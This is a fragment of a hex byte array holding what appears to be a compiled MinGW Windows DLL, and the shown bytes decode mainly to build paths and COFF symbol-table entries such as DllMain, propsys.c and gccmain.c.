,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x73 ,0x72 ,0x63 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x2f ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x2f ,0x63 ,0x6f ,0x6e ,0x66 ,0x69 ,0x67 ,0x2f ,0x69 ,0x33 ,0x38 ,0x36 ,0x2f ,0x63 ,0x79 ,0x67 ,0x77 ,0x69 ,0x6e ,0x2e ,0x53 ,0x00 ,0x43 ,0x3a ,0x5c ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x38 ,0x31 ,0x30 ,0x5c ,0x78 ,0x38 ,0x36 ,0x5f ,0x36 ,0x34 ,0x2d ,0x38 ,0x31 ,0x30 ,0x2d ,0x70 ,0x6f ,0x73 ,0x69 ,0x78 ,0x2d ,0x73 ,0x65 ,0x68 ,0x2d ,0x72 ,0x74 ,0x5f ,0x76 ,0x36 ,0x2d ,0x72 ,0x65 ,0x76 ,0x30 ,0x5c ,0x62 ,0x75 ,0x69 ,0x6c ,0x64 ,0x5c ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x5c ,0x78 ,0x38 ,0x36 ,0x5f ,0x36 ,0x34 ,0x2d ,0x77 ,0x36 ,0x34 ,0x2d ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x33 ,0x32 ,0x5c ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x00 ,0x47 ,0x4e ,0x55 ,0x20 ,0x41 ,0x53 ,0x20 ,0x32 ,0x2e ,0x33 ,0x30 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x28 ,0x00 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x63 ,0x72 ,0x74 ,0x64 ,0x6c ,0x6c ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x51 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x5c ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x69 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x73 ,0x00 ,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x83 ,0x00 ,0x00 ,0x00 ,0x70 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xa8 ,0x00 ,0x00 ,0x00 ,0x80 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xce ,0x00 ,0x00 ,0x00 ,0x40 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf5 ,0x00 ,0x00 ,0x00 ,0xc0 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x0b ,0x01 ,0x00 ,0x00 ,0xb0 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x21 ,0x01 ,0x00 ,0x00 ,0xa0 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x37 ,0x01 ,0x00 ,0x00 ,0x90 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x4d ,0x01 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x61 ,0x01 ,0x00 ,0x00 ,0x60 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x88 ,0x01 ,0x00 ,0x00 ,0x30 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x9a ,0x01 ,0x00 ,0x00 ,0xd0 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x61 ,0x74 ,0x65 ,0x78 ,0x69 ,0x74 ,0x00 ,0x00 ,0x80 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x8f ,0x03 ,0x00 ,0x00 ,0x27 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x1c ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x3c ,0x00 ,0x00 ,0x00 ,0x0f ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xb8 ,0x01 ,0x00 ,0x00 ,0x18 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x37 ,0x00 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x63 ,0x79 ,0x67 ,0x6d ,0x69 ,0x6e ,0x67 ,0x2d ,0x63 ,0x72 ,0x74 ,0x62 ,0x65 ,0x67 ,0x69 ,0x6e ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0xc2 ,0x01 ,0x00 ,0x00 ,0x90 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xd7 ,0x01 ,0x00 ,0x00 ,0xa0 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x90 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x11 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x3c ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x18 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x4a ,0x00 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x70 ,0x72 ,0x6f ,0x70 ,0x73 ,0x79 ,0x73 ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x73 ,0x61 ,0x69 ,0x6c ,0x61 ,0x79 ,0x76 ,0x00 ,0xb0 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x44 ,0x6c ,0x6c ,0x4d ,0x61 ,0x69 ,0x6e ,0x00 ,0xfa ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x03 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x73 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x72 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x5f ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x3c ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x18 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x54 ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x18 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xee ,0x01 ,0x00 ,0x00 ,0xe0 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x3f ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x5e ,0x00 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x67 ,0x63 ,0x63 ,0x6d ,0x61 ,0x69 ,0x6e ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0xf9 ,0x01 ,0x00 ,0x00 ,0x30 ,0x04 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x70 ,0x2e ,0x39 ,0x33 ,0x38 ,0x34 ,0x36 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x0b ,0x02 ,0x00 ,0x00 ,0x70 ,0x04 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x1d ,0x02 ,0x00 ,0x00 ,0x10 ,0x02 ,0x00 ,0x00 ,0x03 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x5f ,0x5f ,0x6d ,0x61 ,0x69 ,0x6e ,0x00 ,0x00 ,0xe0 ,0x04 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x3a ,0x02 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x30 ,0x04 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0xcf ,0x00 ,0x00 ,0x00 ,0x07 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x20 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x04 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x78 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x54 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x18 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x70 ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x6c ,0x00 ,0x00 ,0x00 ,0x04 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x24 ,0x00 ,0x00 ,0x00 ,0x09 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x66 ,0x00 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x6e ,0x61 ,0x74 ,0x73 ,0x74 ,0x61 ,0x72 ,0x74 ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x74 ,0x65 ,0x78 ,0x74 ,0x00 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x64 ,0x61 ,0x74 ,0x61 ,0x00 ,0x00 ,0x00 ,0x10 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x08 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x62 ,0x73 ,0x73 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x00 ,0x00 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x03 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2e ,0x66 ,0x69 ,0x6c ,0x65 ,0x00 ,0x00 ,0x00 ,0x7e ,0x00 ,0x00 ,0x00 ,0xfe ,0xff ,0x00 ,0x00 ,0x67 ,0x01 ,0x67 ,0x73 ,0x5f ,0x73 ,0x75 ,0x70 ,0x70 ,0x6f ,0x72 ,0x74 ,0x2e ,0x63 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x46 ,0x02 ,0x00 ,0x00 ,0x00 ,0x05 ,0x00 ,0x00 ,0x01 ,0x00 ,0x20 ,0x00 ,0x02 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x5d ,0x02 ,0x00 ,0x00 ,0x60 ,0x00 ,0x00 ,0x00 ,0x02 